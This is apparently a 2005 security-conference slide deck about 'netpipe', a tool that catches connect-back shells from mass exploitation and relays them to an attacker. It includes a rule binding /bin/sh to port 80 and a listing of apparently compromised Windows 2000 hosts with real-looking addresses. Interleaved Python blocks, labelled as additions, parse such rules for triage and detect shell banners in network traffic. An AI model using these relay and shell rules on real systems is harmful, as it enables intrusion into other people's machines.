
Evil netpipe

timhsu @ chroot.org

July 2005

Table of contents

- Evolution of attack
- What is netpipe
- Netpipe feature
- Example

Years ago

- Hacked sites one by one
- Banner-scanned the whole IP range after an exploit appeared
- Used only a desktop PC

Today

- Auto tools
    - Massroot exploits
    - Worm
- Target list
    - Banner-scan before the exploit appears
    - Google hacking
- Walking hack
    - Laptop
    - Thanks to wireless

Attack Evolution

Commands

- ls
- cp
- rm
- redirect
- kill
- killall
- history
- pipe

Feature

- Accept TCP connections
- TCP connection redirect
- Manage interface
- Rules

Pipe rules

    pipe act1:ip1:port1 to act2:ip2:port2

Action:

- auto: Connect right now
- wait: Wait connection
- open: Open connection
- exec: Execute program

Pipe example

- Auto
    pipe auto:140.111.1.10:80 to auto:59.62.141.132:21
- Wait
    pipe wait:69.47.28.33:80 to open:201.38.48.216:22
- Exec
    pipe wait:any:80 to exec:/bin/sh:-i
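For incident response, rules like these may turn up in recovered command history. The following parser is an added example, not code from the slides or from netpipe itself; it follows the rule syntax shown above and tags each rule for triage. The tag names and the reading of `exec:<program>:<argument>` are assumptions made for this example.

```python
import re
from dataclasses import dataclass

# Action names and meanings as listed on the "Pipe rules" slide.
ACTIONS = {"auto": "connect right now", "wait": "wait connection",
           "open": "open connection", "exec": "execute program"}
RULE_RE = re.compile(r"^pipe\s+(\S+)\s+to\s+(\S+)$")

@dataclass(frozen=True)
class Endpoint:
    action: str
    target: str  # IP address, "any", or program path for exec
    arg: str     # port for network actions; argument string for exec

def parse_endpoint(text):
    action, _, rest = text.partition(":")
    if action not in ACTIONS or not rest:
        raise ValueError(f"unknown action or empty endpoint: {text!r}")
    if action == "exec":
        # Assumption: exec:<program>[:<argument>], as in exec:/bin/sh:-i
        program, _, arg = rest.partition(":")
        return Endpoint(action, program, arg)
    host, _, port = rest.rpartition(":")
    if not host or not port.isdigit() or not 0 < int(port) < 65536:
        raise ValueError(f"expected ip:port in {text!r}")
    return Endpoint(action, host, port)

def parse_rule(line):
    m = RULE_RE.match(line.strip())
    if not m:
        raise ValueError(f"not a pipe rule: {line!r}")
    return parse_endpoint(m.group(1)), parse_endpoint(m.group(2))

def triage(line):
    """Return triage tags (hypothetical names) for one recovered rule."""
    ends = parse_rule(line)
    # A program attached to a socket is a remote shell; otherwise a relay.
    tags = ["program-on-socket" if any(e.action == "exec" for e in ends)
            else "tcp-relay"]
    if any(e.action != "exec" and e.target == "any" for e in ends):
        tags.append("wildcard-peer")
    return tags

# The three example rules from the slide above.
RULES = ["pipe auto:140.111.1.10:80 to auto:59.62.141.132:21",
         "pipe wait:69.47.28.33:80 to open:201.38.48.216:22",
         "pipe wait:any:80 to exec:/bin/sh:-i"]

if __name__ == "__main__":
    for rule in RULES:
        print(triage(rule), rule)
```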

Exploit attacks

Netpipe accepts

    list
    #6 140.96.0.250:64660 "Microsoft Windows 2000 [Version 5.00.219"
    #7 140.96.119.20:38985 "Microsoft Windows 2000 [Version 5.00.219"
    #8 140.97.162.86:17665 ""
    #9 140.97.178.49:59802 "Microsoft Windows 2000 ["
    #10 140.97.185.4:8705 "Microsoft Windows 2000 [Version 5.00.219"
    #11 140.97.191.102:34860 "Microsoft Windows 2000 [Version 5.00.219"
    #12 140.97.194.178:53781 "Microsoft Windows 2000 [Version 5.00.219"
    #13 140.97.194.190:31074 "Microsoft Windows 2000 [Version 5.00.219"
    #14 140.97.202.14:8209 "Microsoft Windows 2000 [Version 5.00.219"
    #15 140.97.202.29:56571 "Microsoft Windows 2000 [Version 5.00.219"
    #16 140.97.206.212:33401 "Microsoft Windows 2000 [Version 5.00.219"
    #17 140.97.211.58:12054 "Microsoft Windows 2000 [Version 5.00.219"
    #18 140.97.213.73:7108 "Microsoft Windows 2000 [Version 5.00.219"
    #19 140.97.229.89:54011 "Microsoft Windows 2000 [Version 5.00.219"
    #20 211.21.75.208:4823 ""

redirect 10 to 20

Hacker attaches

    list
    #6 140.96.0.250:64660 "Microsoft Windows 2000 [Version 5.00.219"
    #7 140.96.119.20:38985 "Microsoft Windows 2000 [Version 5.00.219"
    #8 140.97.162.86:17665 ""
    #9 140.97.178.49:59802 "Microsoft Windows 2000 ["
    #10 140.97.185.4:8705 <-> 211.21.75.208:4823
    #11 140.97.191.102:34860 "Microsoft Windows 2000 [Version 5.00.219"
    #12 140.97.194.178:53781 "Microsoft Windows 2000 [Version 5.00.219"
    #13 140.97.194.190:31074 "Microsoft Windows 2000 [Version 5.00.219"
    #14 140.97.202.14:8209 "Microsoft Windows 2000 [Version 5.00.219"
    #15 140.97.202.29:56571 "Microsoft Windows 2000 [Version 5.00.219"
    #16 140.97.206.212:33401 "Microsoft Windows 2000 [Version 5.00.219"
    #17 140.97.211.58:12054 "Microsoft Windows 2000 [Version 5.00.219"
    #18 140.97.213.73:7108 "Microsoft Windows 2000 [Version 5.00.219"
    #19 140.97.229.89:54011 "Microsoft Windows 2000 [Version 5.00.219"
    #20 211.21.75.208:4823 <-> 140.97.185.4:8705
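The banners in the listings above are the opening line of a Windows command prompt arriving as the first bytes of a raw TCP session, which gives defenders a network signature. The following detection sketch is an added example, not part of the original slides; the flow record layout, the 10.0.0.0/8 internal range and all sample addresses are constructed for illustration.

```python
import ipaddress
import re

# cmd.exe starts with a line such as "Microsoft Windows 2000 [Version 5.00.2195]".
# The Version part is optional so a truncated first segment (like entry #9
# in the listing above) still matches.
CMD_BANNER = re.compile(
    rb"^\s*Microsoft Windows(?: [\w ]+?)? \[(?:Version [\d.]+)?")

INTERNAL = ipaddress.ip_network("10.0.0.0/8")  # assumed internal range

def is_shell_banner(first_payload):
    """True if a stream's first bytes look like a cmd.exe banner."""
    return CMD_BANNER.match(first_payload) is not None

def flag_flows(flows):
    """flows: iterable of (src_ip, dst_ip, first_payload_sent_by_src).

    Returns (src, dst) pairs where an internal host sent a command prompt
    banner to an external peer as the first data on the connection.
    """
    hits = []
    for src, dst, payload in flows:
        outbound = (ipaddress.ip_address(src) in INTERNAL
                    and ipaddress.ip_address(dst) not in INTERNAL)
        if outbound and is_shell_banner(payload):
            hits.append((src, dst))
    return hits

# Constructed sample records (documentation address ranges, not real hosts).
SAMPLE_FLOWS = [
    ("10.1.2.3", "203.0.113.5",
     b"Microsoft Windows 2000 [Version 5.00.2195]\r\n(C) Copyright"),
    ("10.1.2.4", "203.0.113.5", b"Microsoft Windows 2000 ["),
    ("10.1.2.5", "203.0.113.5", b""),
    ("10.1.2.6", "198.51.100.7", b"GET / HTTP/1.1\r\nHost: example.test\r\n"),
    ("10.1.2.7", "10.9.9.9", b"Microsoft Windows 2000 [Version 5.00.2195]"),
]

if __name__ == "__main__":
    for src, dst in flag_flows(SAMPLE_FLOWS):
        print(f"possible shell over TCP: {src} -> {dst}")
```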

Questions?

Thank You

~ END ~